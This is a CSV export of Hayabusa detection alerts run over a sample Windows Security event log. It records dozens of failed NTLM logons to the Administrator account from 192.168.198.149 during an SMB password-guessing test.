2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SD9UhsShNJRp251r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C5xbL7aO0azgBxfz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xqrUpW8PpI9RAeGk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M80K04eYwfwdzIul | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jcWY7cNeCNgJ3Czr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1OA561UrTkFnbEj3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iDnu1G7jmwLoXGLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e2v70poTOKPUNZJo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhzoOmgTrdvTS27z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pyvmBFGhKFgvzM9S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHC0keHW2YsKeP02 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 29vkwuFa6njYc86s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s9687XPVHFiwttdm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AcNGaeTqTydGinJE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWRu7ZC1eo1nn0IQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M52CihyrQk9MOfCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xBKSOZwS6f9ofXu7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uT1LHJs7kyeMmTtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7FvZhetkdjnZOSpq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0DDC7WfL5T4d01yT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1dUzuddZH3Stespw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LKpORcDX0ccf1xMq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u4RbbKttCYPld8RR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: joni643cVcuBZH9K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bqY6TkW782CWKtvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d8c1I63ULh17l0rN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cjOtMpWutC9qeSss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gmsFnerFYwXXe4Wt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rzIZ4vC0E2CYq5mc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0uZe50jJH0aj9xZi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LZM5UuxLymuAMJcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iF1dq6UfuqpFpGkf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NQVTj9OLayvEg8dg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 98F9mULm7DsRUN49 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h6KjEOAdknvIMwOA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UHUu0OKm8fsHTnum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esdoSyg6HkaSiJ0z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M4lnVe7qNVEspxFV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Phei86bKte1UCbMi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ehA1LQ2Rs0Wts9JW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WcXtnkpww8HlSBb3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y8U7FrQZgDvQ09Uq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UgWwCtz3Gnoq9zYd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mRNPwCogYrwSGeZf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6O9rWY8UGCbuhSwZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HuH4avUJ4AwqXTGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: japOFEaHgyT3T2fO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXpRMMNJRgjmd4km | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtTXA6BiiVyv42cj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wfYkwvNOfKj7rlTj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QzAZyceDjfmUOdz6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C0Qais0cF8avXJQ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7KBM2fIEK6pEl7F2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N3stckaysFk58QAF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oVK4S15DDLWISQ7i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fAA1bFLD5YMohS9q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k5V3sfIsj4kYtaGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJw4MBG0cvIz2fMR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AXJ0UBfKCzLXJ5y0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z3A2mmYGcjHBbX3M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oGlR6pBLnDrzMsqu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gv7nWzZ1HN9mgTya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dnPUb3w2d7Ltif2E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GCWXdvBeDPpeKhWJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GN3OXSzQqLDF348i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AAWiBhYPNQ0RUuOX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V5CBG3hblqr8kvWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MDBaKpfYttm4H1gj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PNszt6piEznMlTdF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iqmBPOQIG6M1rZjX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BJs7tuZpsPMYJHOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LUT5oe2DwS5vW84K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3OTe0uiDHhf5GzRL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 71TuxFRZFyZEQp1S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
